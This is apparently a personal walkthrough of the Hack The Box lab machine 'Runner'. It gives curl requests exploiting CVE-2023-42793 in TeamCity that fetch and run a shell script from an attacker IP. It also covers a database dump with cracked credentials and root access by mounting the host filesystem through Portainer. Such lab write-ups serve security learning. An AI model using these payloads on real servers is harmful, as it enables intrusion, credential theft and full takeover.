Shell as TCUser

 

My first time trying this machine I gave up because I couldnt find anything. I came back again and still couldnt find anything. I guess theres a random subdomain that isnt in any of my subdomain lists. I tried two lists one with 20,000 and one with 110,000 sub domains and neither of them had “teamcity”. Not sure how we were supposed to find this.

 

We have a login page

 

There is a known exploit out there to create an admin user.

https://github.com/H454NSec/CVE-2023-42793

 

 

 

H454NSec6856:@H454NSec

 

 

Now getting a shell was super difficult but following this script made it possible. The github page claims it does it automatically but it doesnt. So I read the script and did it manually with curl which took forever but eventually I got working payloads.

https://github.com/H454NSec/CVE-2023-42793

 

We do have to get a token which we can get here. If we get a 400 error we have to delete the current token and run it again.

curl -X DELETE http://teamcity.runner.htb/app/rest/users/id:1/tokens/RPC2

 

1st command which gets shell.sh

curl -XPOST "http://teamcity.runner.htb/app/rest/debug/processes?exePath=curl&params=http://10.10.14.32:8000/shell.sh&params=-o&params=shell.sh" -H "Authorization: Bearer eyJ0eXAiOiAiVENWMiJ9.anItdVg3WFF5Qnp5SlhCcjROXzk0cWROS0xz.MzlkZjU2MWUtNjA0OC00NDk0LWI3YmEtZDUxYTYzYTgzODA2" -H "Content-Type: text/plain"

 

2nd command which runs chmod +x shell.sh

curl -XPOST "http://teamcity.runner.htb/app/rest/debug/processes?exePath=chmod&params=%2bx&params=shell.sh" -H "Authorization: Bearer eyJ0eXAiOiAiVENWMiJ9.anItdVg3WFF5Qnp5SlhCcjROXzk0cWROS0xz.MzlkZjU2MWUtNjA0OC00NDk0LWI3YmEtZDUxYTYzYTgzODA2" -H "Content-Type: text/plain"

 

3rd command which executes the shell

curl -XPOST "http://teamcity.runner.htb/app/rest/debug/processes?exePath=%2e%2f%73%68%65%6c%6c%2e%73%68" -H "Authorization: Bearer eyJ0eXAiOiAiVENWMiJ9.anItdVg3WFF5Qnp5SlhCcjROXzk0cWROS0xz.MzlkZjU2MWUtNjA0OC00NDk0LWI3YmEtZDUxYTYzYTgzODA2" -H "Content-Type: text/plain"

 

No user flag and we are in a docker container.

 

Shell as John

 

Good docker information

 

 

/data/teamcity_server/datadir/config/projects/AllProjects/pluginData/ssh_keys
 

We have an id_rsa key located in the directory above.

 

We copy the id_rsa key and can verify who its for with ssh-keygen

 

Then we can ssh in and get the user.txt file

 

 

Privilege escalation to Root

 

We are on the machine but our user has little to no access. We can only write to /tmp but it gets deleted shortly after. There is a second user named matthew.

 

 

 

I got a small hint that I missed something in the docker container about getting creds for matthew. 

 

We can create a backup of the database with this script /opt/teamcity/bin/maintainDB.sh however i kept getting errors. Turns out we needed to delete the buildserver.lck file and then it works.

rm /data/teamcity_server/datadir/system/buildserver.lck

./maintainDB.sh backup --all

 

 

This saves a zip file of the database, we unzip it and give our user read writes and we can read the user table to get hashes.

/data/teamcity_server/datadir/backup/database_dump

 

Matthews password cracks to piper123 but we cannot ssh in.

matthew:piper123

 

After running linpeas I saw there was another webpage open that we didnt have access to.

server {
   listen 80;
   server_name portainer-administration.runner.htb;
   location / {
       proxy_pass https://localhost:9443;
       proxy_http_version 1.1;
       proxy_set_header Upgrade $http_upgrade;
       proxy_set_header Connection 'upgrade';
       proxy_set_header Host $host;
       proxy_cache_bypass $http_upgrade;

 

I upload chisel so we can start a reverse proxy and access the webpage. Its a website called portainer.io which I realize very quickly we can setup docker containers with this. Creating a regular container will not work as its isolated. After a bunch of trial and error and some help from ChatGPT I am able to mount the root directory of the actual file system. I tried finding things online and reading the documentation on doing this but there was very very little so thankfully ChatGPT helped with this.

 

Step one is creating a volume linking to the root directory.

 

 

Step two is setting up the container and setting the volume to the root directory we set above.

 

 

 

Once done we can connect via the web GUI by selecting console. This time we can cd to root and we have the root flag.

 

Priv esc on this machine was very very cool but difficult do to the lack of documentation. Really fun machine.